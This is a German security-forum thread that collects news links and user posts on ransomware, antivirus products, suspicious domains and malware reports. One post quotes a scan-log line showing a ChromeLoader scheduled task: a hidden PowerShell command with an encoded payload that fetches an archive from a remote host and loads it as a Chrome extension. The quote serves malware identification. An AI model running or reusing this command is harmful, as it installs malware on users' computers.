Falls sich jemand noch wundern sollte, warum Otto Normalo 3 Party AV einsetzt:
https://www.pcwelt.de/produkte/So_gu...t-8989347.html

Das wichtigste wird völlig unter den Tisch gekehrt: Unversehrtheit von Windows

Ein der besten Kommentare zum Crash in Anhalt -Bitterfeld> https://heise.de/-6141330


https://www.heise.de/forum/heise-onl...39289697/show/

Zitat:

Wobei ich anmerken möchte, dass das Management mit den Prämissen sehr unzufrieden war und das Problem auch erst nach sehr langen Erläuterungen verstanden hat. Es ist immer noch sehr unzufrieden, weil es eigentlich eine Wiederherstellung per Knopfdruck erwartet und sich darin auch durch - imho verantwortungslose - Produktwerbung auch bestärkt sieht.
Das läuft jetzt also nur deshalb so, weil sie keine Gegenmeinung eines Fachmanns dazu auftreiben konnten und die wiederholte Medienberichterstattung zu wochenlangen Ausfällen einen noch schlechteren Zeitablauf zeichnet, als er so realisiert werden kann.
Allerdings war es schwer, gegen das Vorurteil anzukommen, dass alle Betroffenen mit langen Ausfallzeiten nur Vollidioten sind, die kein Sicherungssystem bedienen können. Die Absurdität dieser Annahme hält die Leute ja nicht davon ab, sie trotzdem für valide zu erklären. Sonst müsste man sich ja echte Sorgen machen und das will man nicht.

https://heise.de/-6141310

Zitat:

Doch die Gefahr steige. Einigen Firmen müsse man die Dringlichkeit nach wie vor klarmachen.

"Es ist unmöglich, sich zu 100 Prozent zu schützen", räumt der VDMA-Experte ein. "Getroffen werden kann jeder, so wie jedes Immunsystem von einem Virus getroffen werden kann. Das gestiegene Bewusstsein muss aber auch zu Investitionen in mehr Sicherheit führen." Oft reagierten Unternehmen erst, wenn Hacker ihr Chaos schon angerichtet hätten und man nur noch reagieren könne. "Thema Nummer eins für die Maschinenbau-Branche ist jetzt die Cybersicherheit."
...
...
"Wir bewegen uns in einer Welt trügerischer Sicherheit", heißt es beim Niedersächsischen Städte- und Gemeindebund. "Auf Dauer hilft es uns nur, wenn wir wichtige Dinge in abgeschotteten Systemen bearbeiten."

Z., in dessen Verband sich Firmen zu einem Arbeitskreis gegen Netz-Erpressungen zusammengeschlossen haben, sieht das Kernproblem so: "Die Leichtsinnigkeit ist immer noch ein schwieriges Feld."

https://www.zeit.de/digital/2021-10/...hackerangriffe

Zitat:

BSI-Lagebericht 2021: Kritische Infrastruktur
Angreifer legen Krankenhäuser oder Verwaltungen lahm und gehen dabei immer professioneller vor. Die Bedrohung in Deutschland wächst, zeigt der Lagebericht des BSI.

Und die Türen weiter sperrangelweit offen:

IT-Sicherheit ist viiiel zu teuer

https://www.heise.de/news/IT-Sicherh...eitrag.beitrag

Zitat:

IT-Sicherheit: BSI warnt vor "Alarmstufe Rot"

Die Gesellschaft müsse angesichts anhaltender Bedrohungen etwa durch Ransomware und IT-Schwachstellen "wachsam und wehrhaft sein", fordert das BSI.

https://www.trojaner-board.de/202881...ml#post1758433

Zitat:

Vielleicht handelt es sich bei der Meldung von WD auch um einen Fehlalarm. Und selbst wenn nicht, sonst ist da nichts zu sehen.

https://www.microsoft.com/en-us/wdsi...tID=2147753610

Zitat:

TrojanDownloader:O97M/EncDoc.RDU!MTB

Microsoft Defender Antivirus detects and removes this threat.

This threat downloads and installs other programs, including other malware, onto your PC without your consent.

Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...

Zitat:

Zitat von webwatcher

Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...

Was sollen wir denn jetzt mit so einem Kommentar anfangen?
Niemand kann da eine 100%ige Aussage zu machen. Ich hätte jetzt den TO gefragt woher er diese Datei hat und zu was die gut ist (war!) aber die meisten wissen das ja nicht. Oder sagen dann, dass sie die schon ewig drauf haben, damit schon immer arbeiten aber dann doch löschen lassen.

Wenn sie ihn "ewig" drauf gehabt hätte, sähe der PC vermutlich im Inneren etwas anders aus.

Zitat:

This threat downloads and installs other programs, including other malware, onto your PC without your consent.

Hat eben großes Glück gehabt, dass der Defender angeschlagen hat.

Aber wenn die Leute damit arbeiten, dann doch weil sie so eine Datei selbst erstellen und/oder mit Leben füllen. Eigentlich hätte der TO diese Datei zur Verfügung stellen müssen, so bleibt alles unklar!

https://www.trojaner-board.de/203241...ml#post1760771

Zitat:

Ich wende mich an euch, weil ich beim PC meiner Eltern, einen komischen Chronik Verlauf gefunden habe.
Ständig ist die Internetseite exsalut.com enthalten. Google liefert keine brauchbaren Ergebnisse und wenn man der Seite in der Chronik folgt, kommt man ins leere.

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com

Zitat:

Registrar URL: http://registrar.amazon.com
Updated Date: 2020-05-18T12:48:18Z
Creation Date: 2020-05-18T12:37:17Z
Registry Expiry Date: 2021-05-18T12:37:17Z

Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Zitat:

Zitat von webwatcher

https://www.trojaner-board.de/203241...ml#post1760771

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com


Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Analog zu hier.

Neue Malware (hab ich auch schon bei MB gesehen).

Link zum Thema

Zitat:

Task: {FF650B09-2BA7-407F-AD46-F0DDA995556C} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACIAbgBhAG0AZQA9ACcAYwBoAHIAbwBtAGUALgBlAHgAZQAnACIAKQAg AHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAGkAZgAoACQAXwAgAC0ATQ BhAHQAYwBoACAAIgBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4AIgApAHsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxADsACgB9AAoACgBpAGYA KAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AFAAYQB0AGgAKQApAHsACgAKAAkACQAkAGEAcgBjAG gAaQB2AGUATgBhAG0AZQAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiAAoACgAJAAkAdAByAHkAewAKAAkACQAJ AHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaA BpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIA YQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAKAAoACQB9AAoACgAJAH QAcgB5AHsACgAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAYwBoAHIAbwBtAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEMAbABvAHMAZQBNAGEAaQBu AFcAaQBuAGQAbwB3ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAfQAKAAkACQBzAHQAYQByAHQAIABjAGgAcgBvAG0AZQAgAC0ALQBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4APQAiACQAZQ B4AHQAUABhAHQAaAAiACwAIAAtAC0AcgBlAHMAdABvAHIAZQAtAGwAYQBzAHQALQBzAGUAcwBzAGkAbwBuACwAIAAtAC0AbgBvAGUAcgByAGQAaQBhAGwAbwBnAHMALAAgAC0ALQBkAGkAcwBhAGIA bABlAC0AcwBlAHMAcwBpAG8AbgAtAGMAcgBhAHMAaABlAGQALQBiAHUAYgBiAGwAZQAKAAkAfQBjAGEAdABjAGgAewB9AAoACgB9AAoACgA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (Der Dateneintrag hat 1683 mehr Zeichen). (Keine Datei) <==== ACHTUNG

CHR Extension: (Settings) - C:\Users\tilmu\AppData\Local [2022-01-05]

C:\Users\tilmu\AppData\Local\chrome

Zitat:

========================= Folder: C:\Users\tilmu\AppData\Local\chrome ========================

2022-01-04 10:51 - 2022-01-04 09:51 - 000010714 ____A [8FD91B4289AF2CAA8006118AA082F7B7] () C:\Users\tilmu\AppData\Local\chrome\background.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000221 ____A [1B92868D55E896DA6D17BFB900DE92CF] () C:\Users\tilmu\AppData\Local\chrome\conf.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000484 ____A [A71C82A6FFE68495546E7BB7D3F62A0C] () C:\Users\tilmu\AppData\Local\chrome\manifest.json
2022-01-04 10:51 - 2022-01-04 09:51 - 000003970 ____A [4E46AD8737DD28215F3C478EE8B01DC0] () C:\Users\tilmu\AppData\Local\chrome\settings.png

Third party AV ist bekannt als überflüssiges/contraproduktives Schlangenöl. Ein neues Highlight:

https://www.borncity.com/blog/2022/0...-krypto-miner/

Zitat:

[English]Heute noch ein kleiner Beitrag "aus der Gruft", der zeigt, was man sich heutzutage alles mit Software bei der Installation auf die Systeme holen kann. So manches Software-Paket kommt ja auf viele Mega- oder Gigabyte Download-Größe und man fragt sich, was da alles dabei und zur Installation erforderlich ist. Den Vogel schießt die Sicherheits- und Antivirus-Lösung Norton 360 ab, die so ganz nebenbei einen Krypto-Miner auf dem System des Anwenders installiert. Das kann zwar durch den Anwender gesteuert werden, ist aber trotzdem bedenklich. Ich bin zufällig die Tage auf Twitter auf diesen Fall aufmerksam geworden, weil auf die entsprechende FAQ in der Norton-Community hinwiesen wurde.

https://twitter.com/doctorow/status/1478479483585933312

Zitat:

This is fucking wild. Norton "Antivirus" now sneakily installs cryptomining software on your computer, and then SKIMS A COMMISSION.

Zitat:

Zitat von Google Übersetzer

Das ist verdammt wild. Norton "Antivirus" installiert jetzt heimlich Cryptomining-Software auf Ihrem Computer und kassiert dann EINE KOMMISSION.

Wie gestört ist das denn...

Bin gespannt, ob noch andere AV-Hersteller auf diesen Zug aufspringen...

Hab in einem Forum gesehen, in dem von den Mods audacity.de offiziell promotet wurde

Sie haben es mittlerweile erkannt und editiert /gelöscht

Die Seite war von 2003 - ca 2016 übrigens eine echte deutsche Seite und anfangs auch deutsches Forum.
Dann ist die Seite/URL wohl gekapert worden auf welchem Weg auch immer.

Genau das hat Google bis heute nicht mitbekommen.

https://www.trojaner-board.de/203489...ml#post1762655

Zitat:

Das audacity und VLC jetzt auch zu den gefährlichen Adressen gehören, ist mir neu. Mit beiden Programmen habe ich jahrelang wunderbar gearbeitet. Alternativ für den VLC könnte ich den mitgelieferten Windows-Player nehmen. Aber bei audacity muss mir erst noch eine Alternative suchen.

Die Hinweise geraten z.T in den falschen Hals. Vielleicht sollte man es noch deutlicher machen, dass es um die Quellen geht und nicht um die Programme.

https://www.heise.de/news/Kostenlose...s-6528453.html

Zitat:

Das Deutschland sicher im Netz-Projekt (DsiN) hat offiziell den Startschuss für den Digitalen Führerschein (DiFü) gegeben. Mit rund zwei Monaten Verspätung können sich Bürgerinnen und Bürger auf einer zugehörigen Webseite in die Themengebiete rund um Digitalisierung und Cybersicherheit einlesen und fortbilden. Zudem bietet das Projekt eine Führerscheinprüfung mit drei unterschiedlichen Schwierigkeitsgraden an.

PKW, LKW und Motorrad...

Zitat:

Damit können die Teilnehmerinnen und Teilnehmer Zertifikate ausdrucken, die die digitalen Kompetenzen nachweisen

„Was man schwarz auf weiß besitzt, / kann man getrost nach Hause tragen.“ (bzw faxen....)

https://difü.de/

demnächst hier den Führerschein vorlegen lassen----